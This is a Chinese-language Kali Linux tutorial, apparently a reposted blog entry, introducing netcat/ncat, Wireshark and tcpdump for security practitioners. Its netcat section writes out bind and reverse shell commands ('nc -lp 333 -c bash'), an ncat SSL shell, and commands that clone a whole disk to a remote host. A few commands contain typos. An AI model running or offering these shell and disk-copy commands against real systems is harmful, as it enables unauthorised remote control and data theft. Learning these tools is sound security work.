Kali Linux 从入门到精通(六)-基本工具使用

Kali Linux 从入门到精通(六)-基本工具使用

 

基本工具

常用工具:

经常使用且功能强大

安全从业者必不可少的帮手

Nc/ncat

Wireshark

Tcpdump

 

NETCAT-NC(瑞士军刀)

基本介绍

网络工具中的瑞士军刀-小身材,大智慧

侦听模式/传输模式

telnet/获取banner模式

传输文本信息

传输文件/目录

加密传输文件

远程控制/木马

加密所用流量

流媒体服务器

远程克隆硬盘

一波操作

NC-TELNET/BANNER

nc-nv 1.1.1.1 110 (pop3 服务器)

nc-nv 1.1.1.1 25 (smtp 邮件服务器)

nc-nv 1.1.1.1 80 (网站)

nc -h 查看nc可用参数

NC-传输文本信息

A:nc -l -p 4444(打开4444端口) 使用netstat -pantu | grep 4444 查看端口是否打开

B:nc -nv 1.1.1.1 4444

nc -q 传输后直接断连接

远程电子取证信息收集

NC-传输文件/目录

传输文件

A:nc -lp 333>test.mp4

B:nc -nv 1.1.1.1 333 < test.mp4 -q 1

or

A: nc-q l -lp 333

B: nc-nv 1.1.1.1 333>2.mp4

传输目录

A:tar -cvf -music/ | nc-lp 333 -q 1

B:nc -nv 1.1.1.1 333 | tar -xvf -

加密传文件

A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

B:mcrypt --flush -Fbq -a rjindael-256-m ecb

NC-流媒体服务

A:cat 1.mp4 | nc -lp 333

B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

NC-端口扫描

nc -nvz 1.1.1.1-65535 (探测tcp端口)

nc -nvzu 1.1.1.1-1024 (探测udp端口)

NC-远程克隆硬盘

A(接收端):nc -lp 333 | dd of=/dev/sda

B(被取证电脑):dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

远程电子取证,可以将目标服务器远程复制,或者内存

NC-远程控制

正向:

A(服务器):nc -lp 333 -c bash

B(客户端):nc 1.1.1.1 333

反向:

A:nc -lp 333

B:nc 1.1.1.1 333 -c bash

注:windows用户把bash改成cmd

适用于内网访问外网

NC-NCAT

NC缺乏加密和身份验证(肉鸡可能被窃取)的能力

Ncat包含于nmap工具包中(可实现加密,身份验证,每次会重新生成指纹信息)

A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl

B:ncat -nv 1.1.1.1 333 --ssl

不同系统/平台的nc参数功能不尽相同

 

WIRESHARK(后续补充)-被动扫描大法

基本介绍

抓包嗅探协议分析

安全专家必备的技能

抓包引擎

Libcap9----Linux

Winpcap10—Windows

解码能力(评价之根本)

基本使用方法

启动

选择抓包网卡

混杂模式

实时抓包

保存和分析捕获文件

首选项

WIRESHARK-筛选器

过滤掉干扰的数据包

抓包筛选器

显示筛选器

WIRESHARK-常见协议包

数据的分层结构

ARP

ICMP

TCP(三次握手)

UDP

DNS

HTTP(明文协议)

FTP

WIRESHARK-TCP

数据流

HTTP

SMTP

POP3

SSL

WIRESHARK-信息统计

节点数

协议分布

包大小分布

会话连接

解码方式

专家系统

WIRESHARK-实践

抓包对比nc,ncat加密与不加密的流量

企业抓包部署方案(采用商业化软件)

Sniffer

Cace/riverebed (底层基于wireshark)

Cascad pilot(大流量抓包++)

镜像端口(Cisco)

 

TCPDUMP

基本介绍

No-GUI的抓包分析工具

Linux,Unix系统默认安装

TCPDUMP-抓包

抓包

默认只抓68个字节

tcpdump -i eth0 -s 0 -2 file.pcap

tcpdump -i eth0 port 22

读取抓包文件

tcpdump -r file.pcap

TCPDUMP-筛选

tcpdump -n http.cap | awk ‘{print $3}’ | sort -u

tcpdump -n src host [ip address] -r http.cap

tcpdump -n dst host [ip address] -r http.cap

tcpdump -n port 53 -r http.cap

tcpdump -nX port 80 -r http.cap

TCP 高级筛选

tcpdump -A -n ‘tcp[13]=24’ -r http.cap

过程文档记录

Dradis(Kali 自带)

短期临时小团队资源共享

各种插件导入问价

Keepnote

Truecrypt(注重信息保密)

团队中需要文档人员

---------------------

作者:无涯逍遥

来源:https://blog.csdn.net/qq_33592583/article/details/85638912

 

 

你可能感兴趣的:(Kali,linux,kali,linux从入门到精通)